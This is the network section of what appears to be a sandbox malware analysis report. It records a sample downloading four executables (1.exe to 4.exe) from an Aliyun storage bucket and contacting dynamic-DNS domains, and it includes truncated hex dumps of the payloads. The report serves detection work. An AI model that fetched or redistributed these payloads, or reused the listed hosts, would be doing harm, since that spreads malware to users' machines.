                                                                            Jan 2, 2025 20:35:59.594660997 CET44349852142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:35:59.594887018 CET49852443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:35:59.595309019 CET49852443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:35:59.639333963 CET44349852142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:00.007603884 CET44349852142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:00.007654905 CET44349852142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:00.007769108 CET44349852142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:00.007813931 CET49852443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:00.007813931 CET49852443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:00.009033918 CET49852443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:00.027252913 CET49852443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:00.027262926 CET44349852142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:00.032784939 CET49861443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:00.032852888 CET44349861142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:00.032933950 CET49861443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:00.033133030 CET49861443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:00.033160925 CET44349861142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:00.686091900 CET44349861142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:00.686224937 CET49861443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:00.686845064 CET44349861142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:00.686912060 CET49861443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:00.688692093 CET49861443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:00.688719988 CET44349861142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:00.688976049 CET44349861142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:00.689034939 CET49861443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:00.689457893 CET49861443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:00.735332012 CET44349861142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:01.118144989 CET44349861142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:01.118371964 CET49861443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:01.118550062 CET49861443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:01.118587017 CET44349861142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:01.118635893 CET49861443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:01.150355101 CET49870443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:01.150383949 CET44349870142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:01.150444984 CET49870443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:01.150729895 CET49870443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:01.150742054 CET44349870142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:01.786962986 CET44349870142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:01.787020922 CET49870443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:01.787559986 CET49870443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:01.787569046 CET44349870142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:01.787755966 CET49870443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:01.787760019 CET44349870142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:02.093228102 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:36:02.093306065 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:36:02.229520082 CET44349870142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:02.229567051 CET44349870142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:02.229633093 CET49870443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:02.229644060 CET44349870142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:02.229674101 CET44349870142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:02.229686022 CET49870443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:02.229717016 CET49870443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:02.230364084 CET49870443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:02.230379105 CET44349870142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:02.281008005 CET49876443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:02.281045914 CET44349876142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:02.281102896 CET49876443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:02.281366110 CET49876443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:02.281383038 CET44349876142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:02.950547934 CET44349876142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:02.950625896 CET49876443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:02.951419115 CET44349876142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:02.951464891 CET49876443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:02.953366995 CET49876443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:02.953383923 CET44349876142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:02.953645945 CET44349876142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:02.953691959 CET49876443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:02.955089092 CET49876443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:02.995336056 CET44349876142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:03.342430115 CET44349876142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:03.342480898 CET49876443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:03.342509031 CET44349876142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:03.342545986 CET49876443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:03.343539000 CET49876443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:03.343569994 CET44349876142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:03.343612909 CET49876443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:03.343616009 CET44349876142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:36:03.343677044 CET49876443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:36:03.402581930 CET49887443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:03.402625084 CET44349887142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:03.402693033 CET49887443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:03.403450012 CET49887443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:03.403470993 CET44349887142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:04.031008005 CET44349887142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:04.031090975 CET49887443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:04.031687975 CET49887443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:04.031698942 CET44349887142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:04.032018900 CET49887443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:04.032025099 CET44349887142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:04.378288031 CET44349887142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:04.378350019 CET44349887142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:04.378407001 CET49887443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:04.378432989 CET44349887142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:04.378478050 CET44349887142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:04.378479004 CET49887443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:04.378526926 CET49887443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:04.379179955 CET49887443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:36:04.379194021 CET44349887142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:36:48.963740110 CET4973880192.168.2.469.42.215.252
                                                                            Jan 2, 2025 20:36:49.275995970 CET4973880192.168.2.469.42.215.252
                                                                            Jan 2, 2025 20:36:49.385694027 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:36:49.392025948 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:36:49.885360003 CET4973880192.168.2.469.42.215.252
                                                                            Jan 2, 2025 20:36:51.088504076 CET4973880192.168.2.469.42.215.252
                                                                            Jan 2, 2025 20:36:53.494822979 CET4973880192.168.2.469.42.215.252
                                                                            Jan 2, 2025 20:36:58.308051109 CET4973880192.168.2.469.42.215.252
                                                                            Jan 2, 2025 20:37:07.916665077 CET4973880192.168.2.469.42.215.252

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 2, 2025 20:34:47.789920092 CET5198453192.168.2.41.1.1.1
                                                                            Jan 2, 2025 20:34:48.601571083 CET53519841.1.1.1192.168.2.4
                                                                            Jan 2, 2025 20:34:58.944031000 CET5756353192.168.2.41.1.1.1
                                                                            Jan 2, 2025 20:34:58.951446056 CET53575631.1.1.1192.168.2.4
                                                                            Jan 2, 2025 20:34:58.990386009 CET6371553192.168.2.41.1.1.1
                                                                            Jan 2, 2025 20:34:58.999197006 CET53637151.1.1.1192.168.2.4
                                                                            Jan 2, 2025 20:35:57.843045950 CET5937453192.168.2.41.1.1.1
                                                                            Jan 2, 2025 20:35:57.850435972 CET53593741.1.1.1192.168.2.4
                                                                            Jan 2, 2025 20:35:58.921371937 CET5086153192.168.2.41.1.1.1
                                                                            Jan 2, 2025 20:35:58.928391933 CET53508611.1.1.1192.168.2.4

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jan 2, 2025 20:34:47.789920092 CET192.168.2.41.1.1.10x498cStandard query (0)bruplong.oss-accelerate.aliyuncs.comA (IP address)IN (0x0001)false
                                                                            Jan 2, 2025 20:34:58.944031000 CET192.168.2.41.1.1.10x9d62Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                            Jan 2, 2025 20:34:58.990386009 CET192.168.2.41.1.1.10x7556Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                            Jan 2, 2025 20:35:57.843045950 CET192.168.2.41.1.1.10xeadcStandard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                            Jan 2, 2025 20:35:58.921371937 CET192.168.2.41.1.1.10x85d3Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jan 2, 2025 20:34:48.601571083 CET1.1.1.1192.168.2.40x498cNo error (0)bruplong.oss-accelerate.aliyuncs.comoss-acc-allline.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 2, 2025 20:34:48.601571083 CET1.1.1.1192.168.2.40x498cNo error (0)oss-acc-allline.aliyuncs.comoss-acc-allline.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 2, 2025 20:34:48.601571083 CET1.1.1.1192.168.2.40x498cNo error (0)oss-acc-allline.aliyuncs.com.gds.alibabadns.comeu-central-1.oss-acc.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 2, 2025 20:34:48.601571083 CET1.1.1.1192.168.2.40x498cNo error (0)eu-central-1.oss-acc.aliyuncs.com47.254.187.72A (IP address)IN (0x0001)false
                                                                            Jan 2, 2025 20:34:58.951446056 CET1.1.1.1192.168.2.40x9d62Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 2, 2025 20:34:58.999197006 CET1.1.1.1192.168.2.40x7556No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                            Jan 2, 2025 20:35:43.875564098 CET1.1.1.1192.168.2.40xc3d4No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 2, 2025 20:35:43.875564098 CET1.1.1.1192.168.2.40xc3d4No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                            Jan 2, 2025 20:35:57.850435972 CET1.1.1.1192.168.2.40xeadcNo error (0)docs.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                            Jan 2, 2025 20:35:58.928391933 CET1.1.1.1192.168.2.40x85d3No error (0)drive.usercontent.google.com142.250.185.225A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • docs.google.com
                                                                            • drive.usercontent.google.com
                                                                            • bruplong.oss-accelerate.aliyuncs.com
                                                                            • freedns.afraid.org

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.44973047.254.187.72802828C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 2, 2025 20:34:48.615381002 CET304OUTGET /270/1.exe HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                            Host: bruplong.oss-accelerate.aliyuncs.com
                                                                            Connection: Keep-Alive
                                                                            Jan 2, 2025 20:34:49.438334942 CET1236INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Thu, 02 Jan 2025 19:34:49 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 830976
                                                                            Connection: keep-alive
                                                                            x-oss-request-id: 6776EA59FDD725252BC4B43B
                                                                            Accept-Ranges: bytes
                                                                            ETag: "D026CFE00B08DA14B0A8B7F8860887D7"
                                                                            Last-Modified: Sat, 02 Nov 2024 18:51:16 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 3464722037212978174
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000109
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: 0CbP4AsI2hSwqLf4hgiH1w==
                                                                            x-oss-server-time: 2
                                                                            Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 9c 09 00 00 0e 03 00 00 00 00 00 80 ab 09 00 00 10 00 00 00 b0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 [TRUNCATED]
                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*@@B*0P@!@CODE `DATAT.0@BSS.idataB*,@.tls
                                                                            Jan 2, 2025 20:34:49.438352108 CET1236INData Raw: 00 10 00 00 00 00 30 0a 00 00 00 00 00 00 fc 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 39 00 00 00 00 40 0a 00 00 02 00 00 00 fc 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 80
                                                                            Data Ascii: 0.rdata9@@P.relocP@P.rsrc0@P@P
                                                                            Jan 2, 2025 20:34:49.438363075 CET448INData Raw: c0 ff 25 b4 02 4a 00 8b c0 ff 25 00 02 4a 00 8b c0 ff 25 fc 01 4a 00 8b c0 ff 25 f8 01 4a 00 8b c0 ff 25 f4 01 4a 00 8b c0 ff 25 f0 01 4a 00 8b c0 ff 25 ec 01 4a 00 8b c0 53 83 c4 bc bb 0a 00 00 00 54 e8 41 ff ff ff f6 44 24 2c 01 74 05 0f b7 5c
                                                                            Data Ascii: %J%J%J%J%J%J%JSTAD$,t\$0D[%J%J%J%J%J%J%J%JSVI>u:hDju3^[II3DBdu^[@
                                                                            Jan 2, 2025 20:34:49.438374043 CET1176INData Raw: 70 8b ce 03 4a 04 8b e8 03 6b 0c 3b cd 77 62 3b f0 75 1b 8b 42 04 01 43 08 8b 42 04 29 43 0c 83 7b 0c 00 75 48 8b c3 e8 39 ff ff ff eb 3f 8b ce 8b 7a 04 03 cf 8b e8 03 6b 0c 3b cd 75 05 29 7b 0c eb 2a 8b 0a 03 4a 04 89 0c 24 8b 7b 08 03 7b 0c 2b
                                                                            Data Ascii: pJk;wb;uBCB)C{uH9?zk;u){*J${{+|$+su3;u3YZ]_^[SVW}sjh Vj;t#IluhjP3_^[SVWUC
                                                                            Jan 2, 2025 20:34:49.439729929 CET1236INData Raw: 8b 0c 24 8b d7 8b c5 e8 71 fd ff ff 8b 04 24 83 38 00 74 28 8b 04 24 8b 40 04 01 43 08 8b 04 24 8b 40 04 29 43 0c 83 7b 0c 00 75 10 8b c3 e8 9a fa ff ff eb 07 8b 04 24 33 d2 89 10 83 c4 14 5d 5f 5e 5b c3 90 53 56 57 83 c4 ec 8b f9 89 14 24 8d 98
                                                                            Data Ascii: $q$8t($@C$@)C{u$3]_^[SVW$?4$;s[+L$I]\$tL$T$&D$D$D$D$|$tT$I3_^[U3UhR@d2d"hI9=MI
                                                                            Jan 2, 2025 20:34:49.439739943 CET224INData Raw: 0c 5d 5f 5e 5b c3 8d 40 00 53 56 57 8b f2 8b f8 8b df 89 73 08 8b c3 03 c6 83 e8 0c 89 70 08 81 fe 00 10 00 00 7f 37 8b d6 85 d2 79 03 83 c2 03 c1 fa 02 a1 24 e6 49 00 8b 44 90 f4 85 c0 75 10 a1 24 e6 49 00 89 5c 90 f4 89 5b 04 89 1b eb 3a 8b 10
                                                                            Data Ascii: ]_^[@SVWsp7y$IDu$I\[:CZ,<|uIICZ_^[@=I~@=I}I+I I I3 I3ISVW
                                                                            Jan 2, 2025 20:34:49.439857960 CET1236INData Raw: 83 c4 f0 8b f0 8d 3c 24 a5 a5 8b fc e8 a0 ff ff ff 8d 4c 24 08 8b d7 b8 28 e6 49 00 e8 10 f5 ff ff 8b 5c 24 08 85 db 75 04 33 c0 eb 52 8b 07 3b d8 73 0a e8 99 fd ff ff 29 07 01 47 04 8b 07 03 47 04 8b f3 03 74 24 0c 3b c6 73 08 e8 f0 fd ff ff 01
                                                                            Data Ascii: <$L$(I\$u3R;s)GGt$;sGG;uo IGI_^[@SCD<$tWu3YZ[SVV<$t&u3YZ^[@3y
                                                                            Jan 2, 2025 20:34:49.439868927 CET1236INData Raw: 04 00 74 0b 83 38 00 74 06 83 78 08 0c 7d 0c c7 05 c8 e5 49 00 0b 00 00 00 eb 13 8b 50 08 03 da e8 c8 f7 ff ff 8b d3 8b c6 e8 27 fa ff ff a1 c8 e5 49 00 89 45 fc 33 c0 5a 59 59 64 89 10 68 b1 24 40 00 80 3d 4d e0 49 00 00 74 0a 68 cc e5 49 00 e8
                                                                            Data Ascii: t8tx}IP'IE3ZYYdh$@=MIthIWE_^[Y]SVWU}};u;+$; Iu8$) I$I=IL$ I$)I3
                                                                            Jan 2, 2025 20:34:49.439881086 CET164INData Raw: a4 eb 11 ba 01 00 00 00 eb e5 31 c9 eb ec 89 c1 eb e8 88 07 5f 5e c2 04 00 c3 8d 40 00 53 56 81 c4 f0 fd ff ff 8b f2 8b d8 84 db 74 2d 33 c0 8a c3 83 c0 41 48 88 04 24 c6 44 24 01 3a c6 44 24 02 00 8d 84 24 09 01 00 00 50 68 05 01 00 00 e8 51 e9
                                                                            Data Ascii: 1_^@SVt-3AH$D$:D$$PhQTD$Ph<t$PT$"^[SCC
                                                                            Jan 2, 2025 20:34:49.444519997 CET1236INData Raw: 00 00 33 d2 89 90 04 00 00 00 8b c3 5b c3 8d 40 00 56 57 89 c6 89 d7 89 c8 39 f7 77 13 74 2f c1 f9 02 78 2a f3 a5 89 c1 83 e1 03 f3 a4 5f 5e c3 8d 74 31 fc 8d 7c 39 fc c1 f9 02 78 11 fd f3 a5 89 c1 83 e1 03 83 c6 03 83 c7 03 f3 a4 fc 5f 5e c3 53
                                                                            Data Ascii: 3[@VW9wt/x*_^t1|9x_^SVWUSXt< v;"u{"u3C<"u1S,S"+t<"u;tSS+< wl%>3Q<"u8SS;
                                                                            Jan 2, 2025 20:34:49.444614887 CET1236INData Raw: 00 c7 46 08 80 00 00 00 c7 46 24 00 2d 40 00 89 46 14 66 81 7e 04 b2 d7 74 04 6a f6 eb 0e 81 fe e8 e3 49 00 75 04 6a f4 eb 02 6a f5 e8 74 e3 ff ff 83 f8 ff 74 39 89 06 66 81 7e 04 b1 d7 74 17 ff 36 e8 4e e3 ff ff 85 c0 74 10 83 f8 02 75 07 c7 46
                                                                            Data Ascii: FF$-@Ff~tjIujjtt9f~t6NtuF -@1^6#fFifFSV3LLCfC38IfCCCp-@!PSHYlDH3^[@SfHftIf
                                                                            Jan 2, 2025 20:34:50.317262888 CET304OUTGET /270/2.exe HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                            Host: bruplong.oss-accelerate.aliyuncs.com
                                                                            Connection: Keep-Alive
                                                                            Jan 2, 2025 20:34:50.703460932 CET1236INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Thu, 02 Jan 2025 19:34:50 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 4645376
                                                                            Connection: keep-alive
                                                                            x-oss-request-id: 6776EA5A40E6AE0DD7C69331
                                                                            Accept-Ranges: bytes
                                                                            ETag: "85A57509DB3E9DFA7B4E451B8243220D"
                                                                            Last-Modified: Sat, 02 Nov 2024 19:15:45 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 11212801109602397947
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000109
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: haV1Cds+nfp7TkUbgkMiDQ==
                                                                            x-oss-server-time: 4
                                                                            Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 9c 09 00 00 42 3d 00 00 00 00 00 80 ab 09 00 00 10 00 00 00 b0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 [TRUNCATED]
                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*B=@@G@B*x9<P@!@CODE `DATAT.0@BSS.idataB*,@.tls
                                                                            Jan 2, 2025 20:34:54.315299034 CET304OUTGET /270/3.exe HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                            Host: bruplong.oss-accelerate.aliyuncs.com
                                                                            Connection: Keep-Alive
                                                                            Jan 2, 2025 20:34:54.702008963 CET1236INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Thu, 02 Jan 2025 19:34:54 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 9872
                                                                            Connection: keep-alive
                                                                            x-oss-request-id: 6776EA5E6069439A00C5A68B
                                                                            Accept-Ranges: bytes
                                                                            ETag: "1EDB88F9EE745EAAEE2CBD8219318EB0"
                                                                            Last-Modified: Sat, 02 Nov 2024 15:18:39 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 9658441509656194699
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000109
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: HtuI+e50XqruLL2CGTGOsA==
                                                                            x-oss-server-time: 2
                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e1 46 52 f6 a5 27 3c a5 a5 27 3c a5 a5 27 3c a5 e3 76 e3 a5 a7 27 3c a5 e3 76 dc a5 a7 27 3c a5 ac 5f af a5 a0 27 3c a5 a5 27 3d a5 b8 27 3c a5 a8 75 dd a5 a4 27 3c a5 a8 75 e2 a5 a4 27 3c a5 52 69 63 68 a5 27 3c a5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3a ce ab 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 20 00 00 00 10 00 00 00 80 00 00 80 a5 00 00 00 90 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 00 00 00 10 00 00 00 00 00 00 02 00 40 87 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$FR'<'<'<v'<v'<_'<'='<u'<u'<Rich'<PEL:f @@UPX0UPX1 @UPX2@
                                                                            Jan 2, 2025 20:34:54.821676016 CET304OUTGET /270/4.exe HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                            Host: bruplong.oss-accelerate.aliyuncs.com
                                                                            Connection: Keep-Alive
                                                                            Jan 2, 2025 20:34:55.222863913 CET1236INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Thu, 02 Jan 2025 19:34:55 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 346414
                                                                            Connection: keep-alive
                                                                            x-oss-request-id: 6776EA5FFDD725252BC4B67A
                                                                            Accept-Ranges: bytes
                                                                            ETag: "39E7BE73C7531AC895F75834FDC1BCD6"
                                                                            Last-Modified: Sat, 02 Nov 2024 18:37:48 GMT
